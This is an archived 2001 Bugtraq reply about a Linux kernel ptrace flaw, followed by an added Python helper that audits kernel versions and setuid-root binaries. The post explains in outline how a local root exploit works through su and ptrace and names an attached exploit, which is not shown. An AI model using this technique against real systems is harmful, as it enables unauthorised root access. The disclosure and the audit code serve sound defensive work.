[22912] in bugtraq
Re: Flaws in recent Linux kernels
daemon@ATHENA.MIT.EDU (Martin Kacer)
Fri Oct 19 13:22:16 2001
Date: Fri, 19 Oct 2001 16:47:13 +0200 (CEST)
From: Martin Kacer <m@kacer.net>
To: <bugtraq@securityfocus.com>
Cc: Rafal Wojtczuk <nergal@7bulls.com>
In-Reply-To: <20011018173540.A6671@emperor.7bulls.com>
Message-ID: <Pine.LNX.4.31.0110191625290.4215-200000@duck.sh.cvut.cz>
On Thu, 18 Oct 2001, Rafal Wojtczuk wrote:
# In order for this flaw to be exploitable, /usr/bin/newgrp must be
# setuid root and world-executable. Additionally, newgrp, when run with no
# arguments, should not prompt for password. These
# conditions are satisfied in case of most popular Linux distributions (but
# not Openwall GNU/*/Linux).
Well, there is a little inaccuracy in the first sentence. This is
a kernel flaw, NOT a bug in newgrp. Other suid programs can be used
instead...
Some distributions don't allow exporting LD_* environment variables to
suid binaries (a glibc issue, I think). Thus the trick with LD_DEBUG does
not work for them. Unfortunately, these distributions are still
exploitable.
Both of the preceding paragraphs are demonstrated by the attached
exploit, which is a modification of nergal's code. The same
insert_hellcode program is needed.
The only difference is that /bin/su is used instead of newgrp, and the
correct password is sent to su. Moreover, while su is waiting for the
password, the ptraced process can easily run any suid binary, without the
need to fiddle with complex race conditions.
# 2.4.12 kernel fixes both presented problems. The attached patches,
# 2.2.19-deep-symlink.patch and 2.2.19-ptrace.patch, both blessed by Linus,
# can be used to close the vulnerability in 2.2.19. The (updated)
The patches can avoid my exploit too, of course.
# rely on race-conditions. And finally, notice that under Owl LD_DEBUG is
# ignored in case of suid binaries.
The main conclusion of my posting is: having other versions of newgrp
or ignoring LD_DEBUG is insufficient! Probably, ANY Linux distribution is
vulnerable without the kernel patches!
- M -
PS: What about executing a suid binary while some other process has our
/proc/$$/mem opened for writing? Isn't there the same problem too?
Unfortunately, I do not have enough time to investigate that.
[Attachment: ptrace-exp2.c]
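The post's point is that the exposure depends on two things a defender can check: the kernel release (2.4.12 fixes it; 2.2.19 only with the two listed patches) and the presence of any setuid-root, world-executable binary, since newgrp is just one convenient choice. The following audit helper is an added example, not part of the original post, of nergal's code, or of the attached exploit; the "vulnerable" / "fixed" / "needs-patches" labels are taken only from the versions named in this thread, everything else is classified as "not-covered", and the owner_uid parameter exists solely so the check can be exercised without root.

```python
"""Audit helpers for the ptrace/setuid kernel flaw discussed in the thread.

Added example; not the poster's code. Classification follows only what the
thread states: 2.4.12 fixes the problem, 2.2.19 needs the two listed patches.
"""
import os
import re
import stat


def parse_release(release):
    """Turn a `uname -r` string such as '2.4.10-ac11' into (2, 4, 10)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", release)
    if m is None:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(int(part) for part in m.groups())


def kernel_status(release):
    """Classify a kernel release using only the versions named in the thread."""
    major, minor, patch = parse_release(release)
    if (major, minor) == (2, 4):
        # The thread says 2.4.12 fixes both problems; earlier 2.4 is exposed.
        return "fixed" if patch >= 12 else "vulnerable"
    if (major, minor, patch) == (2, 2, 19):
        # 2.2.19 is fixed only with 2.2.19-deep-symlink.patch and
        # 2.2.19-ptrace.patch applied; the version string cannot tell.
        return "needs-patches"
    # Anything else is outside what the thread discusses.
    return "not-covered"


def is_setuid_world_exec(mode, uid, owner_uid=0):
    """True for a regular file that is setuid, owned by owner_uid and
    executable by others: the precondition the thread names for a target.
    owner_uid is a parameter only so the logic can be tested unprivileged."""
    return bool(stat.S_ISREG(mode)
                and mode & stat.S_ISUID
                and uid == owner_uid
                and mode & stat.S_IXOTH)


def find_setuid_world_exec(dirs, owner_uid=0):
    """Walk the given directories and return matching paths, sorted."""
    hits = []
    for top in dirs:
        for root, _dirnames, filenames in os.walk(top):
            for name in filenames:
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if is_setuid_world_exec(st.st_mode, st.st_uid, owner_uid):
                    hits.append(path)
    return sorted(hits)


def audit(release, dirs=("/bin", "/usr/bin", "/sbin", "/usr/sbin")):
    """Combine both checks; 'exposed' means an unfixed kernel plus at least
    one candidate binary, which is exactly the thread's precondition."""
    status = kernel_status(release)
    suid = find_setuid_world_exec(dirs)
    return {
        "kernel": status,
        "setuid_root_world_exec": suid,
        "exposed": status in ("vulnerable", "needs-patches") and bool(suid),
    }


if __name__ == "__main__":
    report = audit(os.uname().release)
    print("kernel:", report["kernel"])
    for p in report["setuid_root_world_exec"]:
        print("setuid root, world-executable:", p)
    print("exposed per the thread's preconditions:", report["exposed"])
```

Run as root (or at least with read access to the system directories) so that ownership and mode bits are visible; note that the script cannot tell whether the 2.2.19 patches were applied, which is why that case is reported separately rather than as fixed, and that removing LD_DEBUG handling or swapping newgrp does not change the result, matching the post's conclusion.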